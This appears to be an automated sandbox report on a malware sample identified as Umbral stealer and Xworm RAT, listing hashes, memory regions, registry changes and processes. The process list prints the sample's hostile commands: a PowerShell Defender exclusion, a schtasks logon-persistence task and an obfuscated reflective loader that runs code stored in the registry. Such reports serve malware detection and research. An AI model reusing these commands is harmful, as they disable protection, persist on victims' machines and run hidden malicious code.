memory/4376-1-0x0000000000C40000-0x0000000000C8A000-memory.dmp

memory/4376-4-0x00007FFA745E0000-0x00007FFA750A1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe

MD5 737b2d60dc5d475685b65f5c288e00c0
SHA1 144ba7647d8609abe4aab74d4f191e2c594dd55a
SHA256 69c3458a319518d10939633f7421eb833c8c9c904f989f0ef75a572a59a1f084
SHA512 96a22774e1b5c22d9d4114a8f22f1f75cf2edc5970442e1b1e5eabfc70a922d3f4a5e5d8c93150f50ef3da45b241745f861f1d00b306c11707097495b84ecee6

memory/4056-19-0x0000000000830000-0x0000000000840000-memory.dmp

memory/4056-25-0x00007FFA745E0000-0x00007FFA750A1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Modify.exe

MD5 9259d8aef8f52e8ff4fa082c0074c9b0
SHA1 88abb68a5632812be3c18e0c740e3818d9501b3e
SHA256 45d4033eeaa6aa420a644c3eb2d0ef659320c9a13e22d1d16930c807847203db
SHA512 9cb06d4026a53208e80865cdb21d79e40d418518a168680537cafa08f1c295094238014ba35c2b7794a773ac2dc480b01cf5811d5b1e60bf911d7a6d03985ede

memory/1980-29-0x000001FB2EC90000-0x000001FB2ECD0000-memory.dmp

memory/1980-30-0x00007FFA745E0000-0x00007FFA750A1000-memory.dmp

memory/4724-37-0x0000024C45510000-0x0000024C45532000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hwgw02e5.r4j.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6d3e9c29fe44e90aae6ed30ccf799ca8
SHA1 c7974ef72264bbdf13a2793ccf1aed11bc565dce
SHA256 2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d
SHA512 60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a

C:\ProgramData\www.DeadSec0000000000-obfusecator.exe

MD5 22d120454dd38d7f1a3f1cd0eb497f95
SHA1 4c11a082bf8e64b21310b959821a9f7324aa8107
SHA256 6fda5bd63e6647c70c7f420b4145898cada9e1a8bff4fca7f6a5859b648d217c
SHA512 1552101b7a22082eb69fe3485c53f595055bfc6db01ed14d4abc6f9cb9793e8ca3bc2f2448741fd8b4616f735c9f4f2e0299dc938d264103107fccbe68dc39a9

memory/4376-65-0x00007FFA745E0000-0x00007FFA750A1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 ef647504cf229a16d02de14a16241b90
SHA1 81480caca469857eb93c75d494828b81e124fda0
SHA256 47002672443e80410e55a0b6d683573ac27d70d803b57ee3c2818d1008669710
SHA512 a6d8c08c708eee6f7e700880ce79d2ba7cd0acbe8529d96e18f3e90ea1f3cf33fd801dd6eba6017cdd02769e968c48278c090c1deeac710124f79423cd862ee1

memory/1980-78-0x000001FB49320000-0x000001FB49396000-memory.dmp

memory/1980-79-0x000001FB2F1D0000-0x000001FB2F220000-memory.dmp

memory/1980-80-0x000001FB2F160000-0x000001FB2F17E000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 2af06a6b36db9473e4a7d9c7ab72b70b
SHA1 8ef34b9b961e51bdd1b8d7d9db2ec1b0a4764645
SHA256 18a2aa7e245c6732f95fb7749b2b4d29007f2c56a9c5bfbc5e3c127bdfe5f158
SHA512 3495567a5d5af94ae27be51313d9e2630c52017d808042fe0d56baa34fa1d246eb15c253d14c77c77a1d8f2f1c81680e623044ae95415b095696e7fa141ac7cf

memory/4056-103-0x00007FFA745E0000-0x00007FFA750A1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 276798eeb29a49dc6e199768bc9c2e71
SHA1 5fdc8ccb897ac2df7476fbb07517aca5b7a6205b
SHA256 cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc
SHA512 0d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2

memory/1980-126-0x000001FB2F1A0000-0x000001FB2F1AA000-memory.dmp

memory/1980-127-0x000001FB2F240000-0x000001FB2F252000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 77fad1dec6867fb7dd395c25c46d8ae5
SHA1 abfecfd6c63bb35ec88d98ef210adefc139d793e
SHA256 02b0ab469998ac630b421de245ee243599422e7f2c2f9714085fc5b837891784
SHA512 ac8d9d660992d076e46ffdb7422d4916789a7ca2f5737c711449f518745dee197ed1c08e50f81f92cb7d2d1ea94fe024e77a8295e1be05c5a49a0fd7495776d3

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 9fe98fc0c9a0722db4c32cf9aefd31c1
SHA1 8acba0403355289fa4843771a72dbabf67838132
SHA256 de95e5cdd7d4e3bb5439a74b121962c00a94498fb6df03fae7e775b0715421d0
SHA512 b4a2f5de2646808d2763f6316cb0af4096594f410ee1b67e73f157cea21741007868d3362bc5b7dea5b40410e0496ed1144dacf55385cb6569653096dc5faf7e

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 34f595487e6bfd1d11c7de88ee50356a
SHA1 4caad088c15766cc0fa1f42009260e9a02f953bb
SHA256 0f9a4b52e01cb051052228a55d0515911b7ef5a8db3cf925528c746df511424d
SHA512 10976c5deaf9fac449e703e852c3b08d099f430de2d7c7b8e2525c35d63e28b890e5aab63feff9b20bca0aaf9f35a3ba411aee3fbeee9ea59f90ed25bd617a0b

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 dbb904188a321994906abe152659c567
SHA1 1a131923372bab101ca002c35544858fe3e2370c
SHA256 ccd43cc5dbdd2dc786bdd89460c11ea5f55b4e8389b98e0bcd6400f614fe9d04
SHA512 37cbba09369d94ce3d9852503c50a1cdc14a5646d8b4fdeca9bffd3d9284d8e0ceb2801ba458fdddf762f1a4058c5781d0a2f95452d3f7302e42abc5920238ef

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 0b76b616fb826c97e65bef9827b2c11c
SHA1 e602d8bd371e86e288ad84d4838e291c471d59b3
SHA256 254501f64defe7d6e226972045f7e5eb5184ce89f07d96ea7d134b15988196dd
SHA512 9002da9a15dbc7b72904bb4bd0473a02370105e90593bf9d39367b8514ec7c6ec94b8d1111fbb9aa8b562a4d0ba67f43208c54382a32c4251e4d4ff7758b6736

memory/1912-186-0x0000023C31520000-0x0000023C3154A000-memory.dmp

memory/1912-187-0x00007FFA925F0000-0x00007FFA927E5000-memory.dmp

memory/1912-188-0x00007FFA924F0000-0x00007FFA925AE000-memory.dmp

memory/2656-192-0x0000000140000000-0x0000000140008000-memory.dmp

memory/2656-191-0x0000000140000000-0x0000000140008000-memory.dmp

memory/2656-196-0x0000000140000000-0x0000000140008000-memory.dmp

memory/2656-197-0x00007FFA925F0000-0x00007FFA927E5000-memory.dmp

memory/2656-190-0x0000000140000000-0x0000000140008000-memory.dmp

memory/2656-189-0x0000000140000000-0x0000000140008000-memory.dmp

memory/2656-199-0x0000000140000000-0x0000000140008000-memory.dmp

memory/616-211-0x00007FFA52670000-0x00007FFA52680000-memory.dmp

memory/672-222-0x00007FFA52670000-0x00007FFA52680000-memory.dmp

memory/960-233-0x00007FFA52670000-0x00007FFA52680000-memory.dmp

memory/720-248-0x00000252857D0000-0x00000252857FC000-memory.dmp

memory/384-244-0x00007FFA52670000-0x00007FFA52680000-memory.dmp

memory/384-243-0x000001F88F5A0000-0x000001F88F5CC000-memory.dmp

memory/384-237-0x000001F88F5A0000-0x000001F88F5CC000-memory.dmp

memory/960-232-0x000001DA13DA0000-0x000001DA13DCC000-memory.dmp

memory/960-226-0x000001DA13DA0000-0x000001DA13DCC000-memory.dmp

memory/672-221-0x00000288F9B60000-0x00000288F9B8C000-memory.dmp

memory/672-215-0x00000288F9B60000-0x00000288F9B8C000-memory.dmp

memory/616-210-0x000002754E040000-0x000002754E06C000-memory.dmp

memory/616-204-0x000002754E040000-0x000002754E06C000-memory.dmp

memory/616-203-0x000002754E040000-0x000002754E06C000-memory.dmp

memory/616-202-0x000002754E010000-0x000002754E036000-memory.dmp

memory/2656-198-0x00007FFA924F0000-0x00007FFA925AE000-memory.dmp

memory/1980-876-0x00007FFA745E0000-0x00007FFA750A1000-memory.dmp

memory/4056-877-0x00007FFA745E0000-0x00007FFA750A1000-memory.dmp

memory/4900-917-0x0000000000EC0000-0x0000000000ED0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\XClient.exe.log

MD5 2ff39f6c7249774be85fd60a8f9a245e
SHA1 684ff36b31aedc1e587c8496c02722c6698c1c4e
SHA256 e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced
SHA512 1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

memory/3180-1041-0x00000000006B0000-0x00000000006C0000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-08 17:43

Reported

2024-07-08 17:47

Platform

win7-20240708-en

Max time kernel

149s

Max time network

17s

Command Line

winlogon.exe

Signatures

Detect Umbral payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies security service

evasion
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\MpsSvc\Parameters\PortKeywords\DHCP C:\Windows\System32\svchost.exe N/A
Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Parameters\PortKeywords\DHCP\Collection C:\Windows\System32\svchost.exe N/A

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 3056 created 428 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\system32\winlogon.exe

Umbral

stealer umbral

Xworm

trojan rat xworm

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\www.DeadSec0000000000-obfusecator = "C:\\ProgramData\\www.DeadSec0000000000-obfusecator.exe" C:\Users\Admin\AppData\Local\Temp\rootkit.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3056 set thread context of 2148 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe

Enumerates physical storage devices

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 90d4f18d5ed1da01 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\dllhost.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\svchost.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2972 wrote to memory of 2060 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe
PID 2972 wrote to memory of 2060 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe
PID 2972 wrote to memory of 2060 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe
PID 2972 wrote to memory of 2068 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Users\Admin\AppData\Local\Temp\Modify.exe
PID 2972 wrote to memory of 2068 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Users\Admin\AppData\Local\Temp\Modify.exe
PID 2972 wrote to memory of 2068 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Users\Admin\AppData\Local\Temp\Modify.exe
PID 2972 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2972 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2972 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2972 wrote to memory of 1956 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Windows\System32\schtasks.exe
PID 2972 wrote to memory of 1956 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Windows\System32\schtasks.exe
PID 2972 wrote to memory of 1956 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Windows\System32\schtasks.exe
PID 2972 wrote to memory of 2724 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\ProgramData\www.DeadSec0000000000-obfusecator.exe
PID 2972 wrote to memory of 2724 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\ProgramData\www.DeadSec0000000000-obfusecator.exe
PID 2972 wrote to memory of 2724 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\ProgramData\www.DeadSec0000000000-obfusecator.exe
PID 2972 wrote to memory of 2724 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\ProgramData\www.DeadSec0000000000-obfusecator.exe
PID 2664 wrote to memory of 3056 N/A C:\Windows\system32\taskeng.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
PID 2664 wrote to memory of 3056 N/A C:\Windows\system32\taskeng.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
PID 2664 wrote to memory of 3056 N/A C:\Windows\system32\taskeng.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
PID 3056 wrote to memory of 2148 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 3056 wrote to memory of 2148 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 3056 wrote to memory of 2148 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 3056 wrote to memory of 2148 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 3056 wrote to memory of 2148 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 3056 wrote to memory of 2148 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 3056 wrote to memory of 2148 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 3056 wrote to memory of 2148 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 3056 wrote to memory of 2148 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 2148 wrote to memory of 428 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\winlogon.exe
PID 2148 wrote to memory of 472 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\services.exe
PID 2148 wrote to memory of 488 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\lsass.exe
PID 2148 wrote to memory of 496 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\lsm.exe
PID 2148 wrote to memory of 600 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 2148 wrote to memory of 676 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 2148 wrote to memory of 752 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 2148 wrote to memory of 824 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 600 wrote to memory of 1124 N/A C:\Windows\system32\svchost.exe C:\Windows\system32\wbem\wmiprvse.exe
PID 600 wrote to memory of 1124 N/A C:\Windows\system32\svchost.exe C:\Windows\system32\wbem\wmiprvse.exe
PID 600 wrote to memory of 1124 N/A C:\Windows\system32\svchost.exe C:\Windows\system32\wbem\wmiprvse.exe
PID 2148 wrote to memory of 1124 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\wbem\wmiprvse.exe
PID 2148 wrote to memory of 860 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 2148 wrote to memory of 972 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 2148 wrote to memory of 284 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 2148 wrote to memory of 892 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\spoolsv.exe
PID 2148 wrote to memory of 1076 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 2148 wrote to memory of 1088 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\taskhost.exe
PID 2148 wrote to memory of 1168 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\Dwm.exe
PID 2148 wrote to memory of 1212 N/A C:\Windows\System32\dllhost.exe C:\Windows\Explorer.EXE
PID 2148 wrote to memory of 2032 N/A C:\Windows\System32\dllhost.exe C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
PID 2148 wrote to memory of 1312 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\wbem\wmiprvse.exe
PID 2148 wrote to memory of 1444 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\DllHost.exe
PID 2148 wrote to memory of 2276 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 2148 wrote to memory of 2452 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\sppsvc.exe
PID 2148 wrote to memory of 2060 N/A C:\Windows\System32\dllhost.exe C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe
PID 2148 wrote to memory of 2068 N/A C:\Windows\System32\dllhost.exe C:\Users\Admin\AppData\Local\Temp\Modify.exe
PID 2148 wrote to memory of 2664 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\taskeng.exe
PID 2148 wrote to memory of 3056 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
PID 2148 wrote to memory of 1784 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\conhost.exe
PID 2148 wrote to memory of 1124 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\wbem\wmiprvse.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\winlogon.exe

winlogon.exe

C:\Windows\system32\services.exe

C:\Windows\system32\services.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsm.exe

C:\Windows\system32\lsm.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k RPCSS

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\spoolsv.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork

C:\Windows\system32\taskhost.exe

"taskhost.exe"

C:\Windows\system32\Dwm.exe

"C:\Windows\system32\Dwm.exe"

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE

"C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation

C:\Windows\system32\sppsvc.exe

C:\Windows\system32\sppsvc.exe

C:\Users\Admin\AppData\Local\Temp\rootkit.exe

"C:\Users\Admin\AppData\Local\Temp\rootkit.exe"

C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe

"C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe"

C:\Users\Admin\AppData\Local\Temp\Modify.exe

"C:\Users\Admin\AppData\Local\Temp\Modify.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\www.DeadSec0000000000-obfusecator.exe'

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /F /TN "www.DeadSec0000000000-obfusecator" /SC ONLOGON /TR "C:\ProgramData\www.DeadSec0000000000-obfusecator.exe" /RL HIGHEST

C:\ProgramData\www.DeadSec0000000000-obfusecator.exe

"C:\ProgramData\www.DeadSec0000000000-obfusecator.exe"

C:\Windows\system32\taskeng.exe

taskeng.exe {8ED4C929-B5AF-4994-9499-5E66336DC382} S-1-5-18:NT AUTHORITY\System:Service:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+[Char](70)+''+[Char](84)+''+[Char](87)+''+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue(''+'w'+''+[Char](119)+''+'w'+'s'+'t'+''+'a'+''+[Char](103)+''+'e'+'r')).EntryPoint.Invoke($Null,$Null)"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1488989902-8233939581229876322-570263738871046913-1894565484-1302777071-363881733"

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{a2452c33-c5ab-4e6d-809b-15f4873b33e7}

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 gstatic.com udp

Files

memory/2972-0-0x000007FEF5803000-0x000007FEF5804000-memory.dmp

memory/2972-1-0x0000000000E30000-0x0000000000E7A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe

MD5 737b2d60dc5d475685b65f5c288e00c0
SHA1 144ba7647d8609abe4aab74d4f191e2c594dd55a
SHA256 69c3458a319518d10939633f7421eb833c8c9c904f989f0ef75a572a59a1f084
SHA512 96a22774e1b5c22d9d4114a8f22f1f75cf2edc5970442e1b1e5eabfc70a922d3f4a5e5d8c93150f50ef3da45b241745f861f1d00b306c11707097495b84ecee6

memory/2060-15-0x00000000013D0000-0x00000000013E0000-memory.dmp

memory/2068-14-0x0000000000E00000-0x0000000000E40000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Modify.exe

MD5 9259d8aef8f52e8ff4fa082c0074c9b0
SHA1 88abb68a5632812be3c18e0c740e3818d9501b3e
SHA256 45d4033eeaa6aa420a644c3eb2d0ef659320c9a13e22d1d16930c807847203db
SHA512 9cb06d4026a53208e80865cdb21d79e40d418518a168680537cafa08f1c295094238014ba35c2b7794a773ac2dc480b01cf5811d5b1e60bf911d7a6d03985ede

memory/2716-20-0x000000001B7B0000-0x000000001BA92000-memory.dmp

memory/2972-22-0x000007FEF5800000-0x000007FEF61EC000-memory.dmp

memory/2716-21-0x0000000002690000-0x0000000002698000-memory.dmp

memory/2060-23-0x000007FEF5800000-0x000007FEF61EC000-memory.dmp

C:\ProgramData\www.DeadSec0000000000-obfusecator.exe

MD5 22d120454dd38d7f1a3f1cd0eb497f95
SHA1 4c11a082bf8e64b21310b959821a9f7324aa8107
SHA256 6fda5bd63e6647c70c7f420b4145898cada9e1a8bff4fca7f6a5859b648d217c
SHA512 1552101b7a22082eb69fe3485c53f595055bfc6db01ed14d4abc6f9cb9793e8ca3bc2f2448741fd8b4616f735c9f4f2e0299dc938d264103107fccbe68dc39a9

memory/2972-30-0x000007FEF5800000-0x000007FEF61EC000-memory.dmp

memory/3056-31-0x000000001A0B0000-0x000000001A392000-memory.dmp

memory/3056-32-0x0000000000970000-0x0000000000978000-memory.dmp

memory/3056-33-0x00000000012F0000-0x000000000131A000-memory.dmp

memory/3056-34-0x0000000077490000-0x0000000077639000-memory.dmp

memory/3056-35-0x0000000077270000-0x000000007738F000-memory.dmp

memory/2148-36-0x0000000140000000-0x0000000140008000-memory.dmp

memory/2148-38-0x0000000140000000-0x0000000140008000-memory.dmp

memory/2148-39-0x0000000140000000-0x0000000140008000-memory.dmp

memory/2148-37-0x0000000140000000-0x0000000140008000-memory.dmp

memory/2148-44-0x0000000140000000-0x0000000140008000-memory.dmp

memory/2148-43-0x0000000077270000-0x000000007738F000-memory.dmp

memory/2148-42-0x0000000077490000-0x0000000077639000-memory.dmp

memory/2148-41-0x0000000140000000-0x0000000140008000-memory.dmp

memory/488-87-0x00000000374D0000-0x00000000374E0000-memory.dmp

memory/488-86-0x000007FEBE4B0000-0x000007FEBE4C0000-memory.dmp

memory/488-85-0x0000000000A30000-0x0000000000A5C000-memory.dmp

memory/488-79-0x0000000000A30000-0x0000000000A5C000-memory.dmp

memory/472-73-0x00000000374D0000-0x00000000374E0000-memory.dmp

memory/472-72-0x000007FEBE4B0000-0x000007FEBE4C0000-memory.dmp

memory/472-71-0x00000000000E0000-0x000000000010C000-memory.dmp

memory/472-65-0x00000000000E0000-0x000000000010C000-memory.dmp

memory/428-59-0x00000000374D0000-0x00000000374E0000-memory.dmp

memory/428-58-0x000007FEBE4B0000-0x000007FEBE4C0000-memory.dmp

memory/428-57-0x0000000000C50000-0x0000000000C7C000-memory.dmp

memory/428-51-0x0000000000C50000-0x0000000000C7C000-memory.dmp

memory/428-50-0x0000000000C50000-0x0000000000C7C000-memory.dmp

memory/428-49-0x0000000000B00000-0x0000000000B26000-memory.dmp

memory/428-47-0x0000000000B00000-0x0000000000B26000-memory.dmp

memory/496-96-0x00000000002D0000-0x00000000002FC000-memory.dmp

memory/2060-221-0x000007FEF5800000-0x000007FEF61EC000-memory.dmp